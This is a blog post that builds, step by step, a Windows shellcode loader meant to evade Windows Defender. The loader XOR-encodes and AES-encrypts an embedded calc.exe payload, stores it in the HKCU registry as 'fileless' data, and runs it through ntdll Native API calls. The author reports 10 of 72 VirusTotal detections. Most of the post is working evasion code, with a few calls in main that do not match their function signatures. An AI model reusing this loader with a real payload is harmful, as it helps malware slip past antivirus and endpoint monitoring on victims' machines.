Lately I’ve been poking around at Windows internals and writing low level code. This morning I thought I’d try to bypass Window’s Defender and try to get a low score on Virus Total.

One trick I’ve been playing with is writing shellcode to the Windows registry to keep things “fileless.” It’s not super fancy, but it’s kind of neat. I combined that with indirect syscalls and some cryptographic routines to get Windows Defender to chill out.

“Syscalls”

Windows gives each user-mode application a block of virtual addresses. This is known as the user space of that application. The other large block of addresses, known as system space or kernel space, cannot be directly accessed by the application.

To request a service from the kernel (like reading a file or opening a process), a usermode program must make a system call using the syscall instruction. This tells the kernel which function it needs by placing a System Service Number or SSN in the eax register.

The SSN is basically an index in a table known as the system service descriptor table, where each number points to a different kernel function. For example:

  • eax = 0 -> Calls the 1st function in the table
  • eax = 1 -> Calls the 2nd function
  • eax = 2 -> Calls the 3rd, and so on.

The kernel finds the function using: function_address = SSDT_base + (System Service Number)

tl;dr when a syscall instruction runs, the CPU switches from usermode to kernel mode, and the system call handler uses the system service number in eax to execute the correct function.

modes

Image from Microsoft Press Store by Pearson

For example, we can see this artifact here—if I write some code in userland that uses the following Win32 API functions, CreateFileA and WriteFile:

#include <stdio.h>
#include <windows.h>

int main() {
    char path[MAX_PATH];
    char filename[MAX_PATH];
    HANDLE hFile;
    DWORD bytesWritten;

    printf("Enter the path: ");
    scanf("%s", path);

    printf("Enter the filename: ");
    scanf("%s", filename);

    char fullPath[MAX_PATH];
    snprintf(fullPath, sizeof(fullPath), "%s\\%s", path, filename);

    hFile = CreateFileA(fullPath, GENERIC_WRITE, 0, NULL, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, NULL);

    if (hFile == INVALID_HANDLE_VALUE) {
        DWORD error = GetLastError();
        LPVOID errorMsg;
        FormatMessageA(
            FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,
            NULL,
            error,
            0, 
            (LPSTR)&errorMsg,
            0,
            NULL
        );
        printf("Failed to create the file: %s\n", (char*)errorMsg);
        LocalFree(errorMsg);
        return 1;
    }

    const char* content = "Noted";
    if (!WriteFile(hFile, content, strlen(content), &bytesWritten, NULL)) 
{
        printf("Failed to write to the file.\n");
        CloseHandle(hFile);
        return 1;
    }

    CloseHandle(hFile);

    printf("File created successfully: %s\n", fullPath);

    return 0;
}

This code uses the userland hooks CreateFileA and WriteFile. But if we compile this code and step through it in a debugger or decompiler, we’ll see something else: under the hood, these functions invoke NtCreateFile and NtWriteFile—Native API stubs in ntdll.dll that set up registers and issue the actual syscall.

CreateFileA is a high-level wrapper over the Native API. It handles things like ANSI/unicode conversion, then delegates to NtCreateFile, which prepares the registers and triggers the syscall.

The native calls reach out to the System Service Descriptor Table, which holds an an array of offsets to kernel system calls:

typedef struct tagSERVICE_DESCRIPTOR_TABLE {
    SYSTEM_SERVICE_TABLE nt; //effectively a pointer to Service Dispatch Table (SSDT) itself
    SYSTEM_SERVICE_TABLE win32k;
    SYSTEM_SERVICE_TABLE sst3; //pointer to a memory address that contains how many routines are defined in the table
    SYSTEM_SERVICE_TABLE sst4;
} SERVICE_DESCRIPTOR_TABLE;

So, calls to functions in ntdll.dll in turn get converted to low-level calls like ZwCreateFile and ZwWriteFile, courtesy of the index we pass to ntdll.dll and the syscall.

//snipped
mov r10,rcx                     | NtWriteFile
mov eax,8                       |
test byte ptr ds:[7FFE0308],1   |
jne ntdll.7FFF055AEE55          |
syscall                         |
ret                   

In this blog post, we’ll use indirect syscalls which leverage native functions within ntdll.dll, avoiding certain calls to the Win32 API. In a future blog post, we’ll cover making some changes in our setup to further unhook these functions for potentially increased stealth.

For You and Me

By default, Windows Defender and various telemetry heavily monitor most of the things that happen in userland. This is to say that using userland hooks to do anything interesting can make it stick out—in a bad way.

To improve our chances of flying under the radar, we can use some alternative userland functions and instead make calls using Native API functionality within ntdll.dll, which in turn make syscalls to the kernel.

But to do this, we’ll need some initial declarations. These are the type definitions we’ll use for Native API functions. We start with the _PS_ATTRIBUTE for process and thread creation1, along with unicode handling, process attributes, and identification for processes and threads.

We also define the types we’ll need for indirect calls to allocate memory2 and spin up new process threads3, using pNtAllocateVirtualMemory, pNtCreateThreadEx, and pNtWaitForSingleObject, respectively.

#include <windows.h>
#include <stdio.h>
#include <Lmcons.h> // for UNLEN
#include <stdlib.h>
#include <bcrypt.h>
#pragma comment(lib, "bcrypt.lib")

typedef struct _PS_ATTRIBUTE {
    ULONG Attribute;
    SIZE_T Size;
    union {
        ULONG Value;
        PVOID ValuePtr;
    } u1;
    PSIZE_T ReturnLength;
} PS_ATTRIBUTE, * PPS_ATTRIBUTE;

typedef struct _PS_ATTRIBUTE_LIST {
    SIZE_T TotalLength;
    PS_ATTRIBUTE Attributes[1];
} PS_ATTRIBUTE_LIST, * PPS_ATTRIBUTE_LIST;

typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
    PWSTR  Buffer;
} UNICODE_STRING, * PUNICODE_STRING;

typedef struct _OBJECT_ATTRIBUTES {
    ULONG           Length;
    HANDLE          RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG           Attributes;
    PVOID           SecurityDescriptor;
    PVOID           SecurityQualityOfService;
} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;

typedef struct _CLIENT_ID {
    PVOID UniqueProcess;
    PVOID UniqueThread;
} CLIENT_ID, * PCLIENT_ID;

// Define prototypes with proper calling convention
typedef NTSTATUS(NTAPI* pNtAllocateVirtualMemory)(
    HANDLE ProcessHandle,
    PVOID* BaseAddress,
    ULONG_PTR ZeroBits,
    PSIZE_T RegionSize,
    ULONG AllocationType,
    ULONG Protect
    );

typedef NTSTATUS(NTAPI* pNtProtectVirtualMemory)(
    HANDLE ProcessHandle,
    PVOID* BaseAddress,
    PSIZE_T NumberOfBytesToProtect,
    ULONG NewAccessProtection,
    PULONG OldAccessProtection
    );

typedef NTSTATUS(NTAPI* pNtCreateThreadEx)(
    PHANDLE ThreadHandle,
    ACCESS_MASK DesiredAccess,
    POBJECT_ATTRIBUTES ObjectAttributes,
    HANDLE ProcessHandle,
    PVOID StartRoutine,
    PVOID Argument,
    ULONG CreateFlags,
    SIZE_T ZeroBits,
    SIZE_T StackSize,
    SIZE_T MaximumStackSize,
    PPS_ATTRIBUTE_LIST AttributeList
    );

typedef NTSTATUS(NTAPI* pNtWaitForSingleObject)(
    HANDLE Handle,
    BOOLEAN Alertable,
    PLARGE_INTEGER Timeout
    );

typedef NTSTATUS(NTAPI* pNtFreeVirtualMemory)(
    HANDLE ProcessHandle,
    PVOID* BaseAddress,
    PSIZE_T RegionSize,
    ULONG FreeType
    );

typedef NTSTATUS(NTAPI* pNtClose)(
    HANDLE Handle
    );

// Function to get NTDLL function address
PVOID GetNtdllFunction(LPCSTR FunctionName) {
    HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
    if (!hNtdll) {
        return NULL;
    }
    return GetProcAddress(hNtdll, FunctionName);
}

To reiterate the point here: all of this is to avoid calling user-land hooks that are more heavily monitored by telemetry products like Windows Defender. For example, the userland function CreateRemoteThread might stick out. That is, instead of calling the user-land hook, we call pNtCreateThreadEx.

Next we need some shell code. This is just a simple payload that launches calc.exe.

Side note: I’ve already XOR’d the payload before embedding it in the program. We’ll reverse the XOR just before execution.

So, beyond our shellcode, we’ll use the following constructions: an AES encryption routine, an AES decryption routine, a reverse XOR routine, and indirect system calls.

We generate our encryption key using the username of the current user. If the username is less than 16 characters, we just pad it with 0x01. We follow the conventions for using the BCrypt API from Microsoft4.

const BYTE shellcode[] = {
    0xb7, 0x03, 0xc8, 0xaf, 0xbb, 0xa3, 0x8b, 0x4b, 0x4b, 0x4b, 0x0a, 0x1a, 0x0a, 0x1b, 0x19, 0x1a, 
    0x1d, 0x03, 0x7a, 0x99, 0x2e, 0x03, 0xc0, 0x19, 0x2b, 0x03, 0xc0, 0x19, 0x53, 0x03, 0xc0, 0x19, 
    0x6b, 0x03, 0xc0, 0x39, 0x1b, 0x03, 0x44, 0xfc, 0x01, 0x01, 0x06, 0x7a, 0x82, 0x03, 0x7a, 0x8b, 
    0xe7, 0x77, 0x2a, 0x37, 0x49, 0x67, 0x6b, 0x0a, 0x8a, 0x82, 0x46, 0x0a, 0x4a, 0x8a, 0xa9, 0xa6, 
    0x19, 0x0a, 0x1a, 0x03, 0xc0, 0x19, 0x6b, 0xc0, 0x09, 0x77, 0x03, 0x4a, 0x9b, 0xc0, 0xcb, 0xc3, 
    0x4b, 0x4b, 0x4b, 0x03, 0xce, 0x8b, 0x3f, 0x2c, 0x03, 0x4a, 0x9b, 0x1b, 0xc0, 0x03, 0x53, 0x0f, 
    0xc0, 0x0b, 0x6b, 0x02, 0x4a, 0x9b, 0xa8, 0x1d, 0x03, 0xb4, 0x82, 0x0a, 0xc0, 0x7f, 0xc3, 0x03, 
    0x4a, 0x9d, 0x06, 0x7a, 0x82, 0x03, 0x7a, 0x8b, 0xe7, 0x0a, 0x8a, 0x82, 0x46, 0x0a, 0x4a, 0x8a, 
    0x73, 0xab, 0x3e, 0xba, 0x07, 0x48, 0x07, 0x6f, 0x43, 0x0e, 0x72, 0x9a, 0x3e, 0x93, 0x13, 0x0f, 
    0xc0, 0x0b, 0x6f, 0x02, 0x4a, 0x9b, 0x2d, 0x0a, 0xc0, 0x47, 0x03, 0x0f, 0xc0, 0x0b, 0x57, 0x02, 
    0x4a, 0x9b, 0x0a, 0xc0, 0x4f, 0xc3, 0x03, 0x4a, 0x9b, 0x0a, 0x13, 0x0a, 0x13, 0x15, 0x12, 0x11, 
    0x0a, 0x13, 0x0a, 0x12, 0x0a, 0x11, 0x03, 0xc8, 0xa7, 0x6b, 0x0a, 0x19, 0xb4, 0xab, 0x13, 0x0a, 
    0x12, 0x11, 0x03, 0xc0, 0x59, 0xa2, 0x1c, 0xb4, 0xb4, 0xb4, 0x16, 0x03, 0xf1, 0x4a, 0x4b, 0x4b, 
    0x4b, 0x4b, 0x4b, 0x4b, 0x4b, 0x03, 0xc6, 0xc6, 0x4a, 0x4a, 0x4b, 0x4b, 0x0a, 0xf1, 0x7a, 0xc0, 
    0x24, 0xcc, 0xb4, 0x9e, 0xf0, 0xbb, 0xfe, 0xe9, 0x1d, 0x0a, 0xf1, 0xed, 0xde, 0xf6, 0xd6, 0xb4, 
    0x9e, 0x03, 0xc8, 0x8f, 0x63, 0x77, 0x4d, 0x37, 0x41, 0xcb, 0xb0, 0xab, 0x3e, 0x4e, 0xf0, 0x0c, 
    0x58, 0x39, 0x24, 0x21, 0x4b, 0x12, 0x0a, 0xc2, 0x91, 0xb4, 0x9e, 0x28, 0x2a, 0x27, 0x28, 0x65, 
    0x2e, 0x33, 0x2e, 0x4b
};

const DWORD shellcodeSize = sizeof(shellcode);

// AES Configuration
#define AES_KEY_LENGTH 16  // 128-bit AES
#define AES_BLOCK_SIZE 16

// Helper function to generate encryption key from user environment
BOOL GenerateKeyFromEnvironment(BYTE* key, DWORD keySize) {
    CHAR username[UNLEN + 1];
    DWORD usernameLen = UNLEN + 1;

    if (!GetUserNameA(username, &usernameLen)) {
        printf("Failed to get username: %d\n", GetLastError());
        return FALSE;
    }

    BYTE padding = 0x01;
    for (DWORD i = 0; i < keySize; i++) {
        if (i < usernameLen) {
            key[i] = (BYTE)username[i];
        }
        else {
            key[i] = padding++;
        }
    }
    return TRUE;
}

// AES Encryption Function
BOOL AESEncrypt(const BYTE* plaintext, DWORD plaintextSize, const BYTE* key,
    BYTE** ciphertext, DWORD* ciphertextSize) {
    BCRYPT_ALG_HANDLE hAlgorithm = NULL;
    BCRYPT_KEY_HANDLE hKey = NULL;
    NTSTATUS status;

    // Open AES provider
    status = BCryptOpenAlgorithmProvider(&hAlgorithm, BCRYPT_AES_ALGORITHM,
        NULL, 0);
    if (status != 0) {
        printf("BCryptOpenAlgorithmProvider failed: 0x%x\n", status);
        return FALSE;
    }

    // Set ECB mode 
    status = BCryptSetProperty(hAlgorithm, BCRYPT_CHAINING_MODE,
        (BYTE*)BCRYPT_CHAIN_MODE_ECB,
        sizeof(BCRYPT_CHAIN_MODE_ECB), 0);
    if (status != 0) {
        BCryptCloseAlgorithmProvider(hAlgorithm, 0);
        printf("BCryptSetProperty failed: 0x%x\n", status);
        return FALSE;
    }

    // Create key handle
    status = BCryptGenerateSymmetricKey(hAlgorithm, &hKey, NULL, 0,
        (BYTE*)key, AES_KEY_LENGTH, 0);
    if (status != 0) {
        BCryptCloseAlgorithmProvider(hAlgorithm, 0);
        printf("BCryptGenerateSymmetricKey failed: 0x%x\n", status);
        return FALSE;
    }

    // Get output buffer size
    DWORD cbCiphertext = 0;
    status = BCryptEncrypt(hKey, (BYTE*)plaintext, plaintextSize, NULL,
        NULL, 0, NULL, 0, &cbCiphertext, BCRYPT_BLOCK_PADDING);
    if (status != 0) {
        BCryptDestroyKey(hKey);
        BCryptCloseAlgorithmProvider(hAlgorithm, 0);
        printf("BCryptEncrypt size check failed: 0x%x\n", status);
        return FALSE;
    }

    // Allocate ciphertext buffer
    *ciphertext = (BYTE*)malloc(cbCiphertext);
    if (!*ciphertext) {
        BCryptDestroyKey(hKey);
        BCryptCloseAlgorithmProvider(hAlgorithm, 0);
        printf("Memory allocation failed\n");
        return FALSE;
    }

    // Perform encryption
    status = BCryptEncrypt(hKey, (BYTE*)plaintext, plaintextSize, NULL,
        NULL, 0, *ciphertext, cbCiphertext,
        ciphertextSize, BCRYPT_BLOCK_PADDING);
    if (status != 0) {
        free(*ciphertext);
        BCryptDestroyKey(hKey);
        BCryptCloseAlgorithmProvider(hAlgorithm, 0);
        printf("BCryptEncrypt failed: 0x%x\n", status);
        return FALSE;
    }

    // Cleanup
    BCryptDestroyKey(hKey);
    BCryptCloseAlgorithmProvider(hAlgorithm, 0);
    return TRUE;
}

If all goes well, we succeed in deriving a key and encrypting the shellcode. But we also need an AES decryption routine. The use of AES routines to keep our payload safe further reduces the likelihood of Windows Defender catching us.

// AES Decryption Function
BOOL AESDecrypt(const BYTE* ciphertext, DWORD ciphertextSize, const BYTE* key,
    BYTE** plaintext, DWORD* plaintextSize) {
    BCRYPT_ALG_HANDLE hAlgorithm = NULL;
    BCRYPT_KEY_HANDLE hKey = NULL;
    NTSTATUS status;

    // Open AES provider
    status = BCryptOpenAlgorithmProvider(&hAlgorithm, BCRYPT_AES_ALGORITHM,
        NULL, 0);
    if (status != 0) {
        printf("BCryptOpenAlgorithmProvider failed: 0x%x\n", status);
        return FALSE;
    }

    // Set ECB mode
    status = BCryptSetProperty(hAlgorithm, BCRYPT_CHAINING_MODE,
        (BYTE*)BCRYPT_CHAIN_MODE_ECB,
        sizeof(BCRYPT_CHAIN_MODE_ECB), 0);
    if (status != 0) {
        BCryptCloseAlgorithmProvider(hAlgorithm, 0);
        printf("BCryptSetProperty failed: 0x%x\n", status);
        return FALSE;
    }

    // Create key handle
    status = BCryptGenerateSymmetricKey(hAlgorithm, &hKey, NULL, 0,
        (BYTE*)key, AES_KEY_LENGTH, 0);
    if (status != 0) {
        BCryptCloseAlgorithmProvider(hAlgorithm, 0);
        printf("BCryptGenerateSymmetricKey failed: 0x%x\n", status);
        return FALSE;
    }

    // Get output buffer size
    DWORD cbPlaintext = 0;
    status = BCryptDecrypt(hKey, (BYTE*)ciphertext, ciphertextSize, NULL,
        NULL, 0, NULL, 0, &cbPlaintext, BCRYPT_BLOCK_PADDING);
    if (status != 0) {
        BCryptDestroyKey(hKey);
        BCryptCloseAlgorithmProvider(hAlgorithm, 0);
        printf("BCryptDecrypt size check failed: 0x%x\n", status);
        return FALSE;
    }

    // Allocate plaintext buffer
    *plaintext = (BYTE*)malloc(cbPlaintext);
    if (!*plaintext) {
        BCryptDestroyKey(hKey);
        BCryptCloseAlgorithmProvider(hAlgorithm, 0);
        printf("Memory allocation failed\n");
        return FALSE;
    }

    // Perform decryption
    status = BCryptDecrypt(hKey, (BYTE*)ciphertext, ciphertextSize, NULL,
        NULL, 0, *plaintext, cbPlaintext,
        plaintextSize, BCRYPT_BLOCK_PADDING);
    if (status != 0) {
        free(*plaintext);
        BCryptDestroyKey(hKey);
        BCryptCloseAlgorithmProvider(hAlgorithm, 0);
        printf("BCryptDecrypt failed: 0x%x\n", status);
        return FALSE;
    }

    // Cleanup
    BCryptDestroyKey(hKey);
    BCryptCloseAlgorithmProvider(hAlgorithm, 0);
    return TRUE;
}

However, even after this, we’ll make one final effort to subvert Windows Defender—namely, by writing our encrypted payload to the Windows registry, so as to remain stealthy, fileless, and potentially persistent.

In other words: we’re never writing to disk. Our shellcode lives only in memory, getting decrypted and XOR-decoded on the fly before execution.

But how can we perform reads and writes against the Windows regstry? We’ll need to use the winreg API from Microsoft.5

First we’ll make use of RegOpenKeyExA and RegSetValueExA since we want to write to the Window’s registry. But we need somewhere to write! And we want to write to Control Panel, under the current running user’s username.

So, before we read or write, we’ll get the username from the current environment and append it to the write operation under the HKEY Control Panel – this way when we do write out, it will be under HKEY_CURRENT_USER\Control Panel\Username.

And afterward, we use RegQueryValueExA to do the opposite operation, querying and reading the registry key we’ve written.

BOOL writeRegistry(const BYTE* data, DWORD dataSize, const char* valueName) {
    HKEY hKey;
    LONG status = RegOpenKeyExA(HKEY_CURRENT_USER, "Control Panel", 0, KEY_SET_VALUE, &hKey);
    if (status != ERROR_SUCCESS) {
        printf("Error opening key: %d\n", GetLastError());
        return FALSE;
    }

    status = RegSetValueExA(hKey, valueName, 0, REG_BINARY, data, dataSize);
    RegCloseKey(hKey);

    if (status != ERROR_SUCCESS) {
        printf("Error writing value: %d\n", GetLastError());
        return FALSE;
    }

    return TRUE;
}

BOOL readRegistry(BYTE** buffer, DWORD* bytesRead, const char* valueName) {
    HKEY hKey;
    LONG status = RegOpenKeyExA(HKEY_CURRENT_USER, "Control Panel", 0, KEY_READ, &hKey);
    if (status != ERROR_SUCCESS) {
        printf("Error opening key: %d\n", GetLastError());
        return FALSE;
    }

    DWORD type, size = 0;
    status = RegQueryValueExA(hKey, valueName, NULL, &type, NULL, &size);
    if (status != ERROR_SUCCESS) {
        RegCloseKey(hKey);
        printf("Error querying value size: %d\n", GetLastError());
        return FALSE;
    }

    *buffer = (BYTE*)malloc(size);
    if (!*buffer) {
        RegCloseKey(hKey);
        printf("Memory allocation failed\n");
        return FALSE;
    }

    status = RegQueryValueExA(hKey, valueName, NULL, &type, *buffer, &size);
    RegCloseKey(hKey);

    if (status != ERROR_SUCCESS) {
        free(*buffer);
        printf("Error reading value: %d\n", GetLastError());
        return FALSE;
    }

    *bytesRead = size;
    return TRUE;
}

Before we wrap things up with our shellcode execution and main functions, we need a small gadget to decode the payload, since the payload in this script was one I XOR’d beforehand.

void XORDecode(BYTE* data, DWORD dataSize, BYTE key) {
    for (DWORD i = 0; i < dataSize; i++) {
        data[i] ^= key;
    }
}

Alright, now we’re close. We need to make use of the type definitions for indirect syscalls we created earlier.

We get the function pointers to allocate and protect virtual memory, as well as to spin a new thread and wait for it to launch. And our epilogue will use the NtFreeVirtualMemory function to free our objects when we’re done.

So, fundamentally what we’re doing is dropping our now decrypted and XOR decoded shellcode into read-write-execute memory via ntdll calls for evasion.

Our process spins up as a new thread in our current process– then we wait for it to finish.

And the resulting shellcode that’s launched effectively forks off from our current process. After this, we clean up our memory and bail out cleanly.

void ExecuteShellcode(BYTE* shellcode, SIZE_T size) {
    XORDecode(shellcode, size, 'K');
    // Get function pointers
    pNtAllocateVirtualMemory NtAllocateVirtualMemory = (pNtAllocateVirtualMemory)GetNtdllFunction("NtAllocateVirtualMemory");
    pNtProtectVirtualMemory NtProtectVirtualMemory = (pNtProtectVirtualMemory)GetNtdllFunction("NtProtectVirtualMemory");
    pNtCreateThreadEx NtCreateThreadEx = (pNtCreateThreadEx)GetNtdllFunction("NtCreateThreadEx");
    pNtWaitForSingleObject NtWaitForSingleObject = (pNtWaitForSingleObject)GetNtdllFunction("NtWaitForSingleObject");
    pNtFreeVirtualMemory NtFreeVirtualMemory = (pNtFreeVirtualMemory)GetNtdllFunction("NtFreeVirtualMemory");
    pNtClose NtClose = (pNtClose)GetNtdllFunction("NtClose");

    if (!NtAllocateVirtualMemory || !NtProtectVirtualMemory || !NtCreateThreadEx ||
        !NtWaitForSingleObject || !NtFreeVirtualMemory || !NtClose) {
        printf("Failed to get NTDLL function pointers\n");
        return;
    }

    PVOID execMemory = NULL;
    SIZE_T regionSize = size;
    ULONG oldProtect;

    // Allocate memory
    NTSTATUS status = NtAllocateVirtualMemory(
        GetCurrentProcess(),
        &execMemory,
        0,
        &regionSize,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_READWRITE
    );

    if (status != 0) {
        printf("NtAllocateVirtualMemory failed: 0x%x\n", status);
        return;
    }

    // Copy shellcode
    memcpy(execMemory, shellcode, size);

    // Change protection
    status = NtProtectVirtualMemory(
        GetCurrentProcess(),
        &execMemory,
        &size,
        PAGE_EXECUTE_READ,
        &oldProtect
    );

    if (status != 0) {
        printf("NtProtectVirtualMemory failed: 0x%x\n", status);
        NtFreeVirtualMemory(GetCurrentProcess(), &execMemory, &size, MEM_RELEASE);
        return;
    }

    // Create thread
    HANDLE hThread = NULL;
    status = NtCreateThreadEx(
        &hThread,
        THREAD_ALL_ACCESS,
        NULL,
        GetCurrentProcess(),
        (LPTHREAD_START_ROUTINE)execMemory,
        NULL,
        0,
        0,
        0,
        0,
        NULL
    );

    if (status != 0) {
        printf("NtCreateThreadEx failed: 0x%x\n", status);
        NtFreeVirtualMemory(GetCurrentProcess(), &execMemory, &size, MEM_RELEASE);
        return;
    }

    // Wait for thread
    status = NtWaitForSingleObject(hThread, FALSE, NULL);
    if (status != 0) {
        printf("NtWaitForSingleObject failed: 0x%x\n", status);
    }

    // Cleanup
    NtClose(hThread);
    NtFreeVirtualMemory(GetCurrentProcess(), &execMemory, &size, MEM_RELEASE);
}

So, to recap and tie all of it together.

  1. We use the current username the process is running under as a cryptographic key for our AES routines.
  2. We encrypt our shellcode and write this out to the Windows registry.
  3. Then we read it back out using the AES decryption routine before calling the function to actually execute the shellcode.
  4. Finally, in ExecuteShellcode we reverse the XOR just before running the shellcode. We spin up a new thread and wait with NtWaitForSingleObject – if all goes well, we get a fresh calc.exe and Window’s Defender doesn’t yell at us!

int main() {
    BYTE key[AES_KEY_LENGTH];
    if (!GenerateKeyFromEnvironment(key, AES_KEY_LENGTH)) {
        return 1;
    }

    // Encrypt payload
    BYTE* encryptedShellcode = NULL;
    DWORD encryptedSize = 0;
    if (!AESEncrypt(shellcode, shellcodeSize, key, &encryptedShellcode, &encryptedSize)) {
        return 1;
    }

    // Write to registry
    if (!writeRegistry(encryptedShellcode, encryptedSize)) {
        free(encryptedShellcode);
        return 1;
    }
    free(encryptedShellcode);
    printf("Successfully wrote encrypted payload to registry\n");

    // Read from registry
    BYTE* readBuffer = NULL;
    DWORD bytesRead;
    if (!readRegistry(&readBuffer, &bytesRead)) {
        return 1;
    }

    // Decrypt payload
    BYTE* decryptedShellcode = NULL;
    DWORD decryptedSize;
    if (!AESDecrypt(readBuffer, bytesRead, key, &decryptedShellcode, &decryptedSize)) {
        free(readBuffer);
        return 1;
    }
    free(readBuffer);

    // Verify decrypted size matches original
    if (decryptedSize != shellcodeSize) {
        printf("Decrypted size mismatch! Expected %d, got %d\n", shellcodeSize, decryptedSize);
        free(decryptedShellcode);
        return 1;
    }

    // Execute the shellcode
    printf("Executing decrypted payload...\n");
    ExecuteShellcode(decryptedShellcode, decryptedSize);
    free(decryptedShellcode);

    return 0;
}

Alright, let’s check the score board. Are we able to successfully read and write to the registry and execute shellcode without Windows Defender complaining?

Calculator

Looks good. Let’s see how many antivirus vendors detect our code. Ahh, only ten of of 72! That’s not bad. But we could also do better!

VirusTotal

Next post!

Proof of concept on Github: RegistryGhost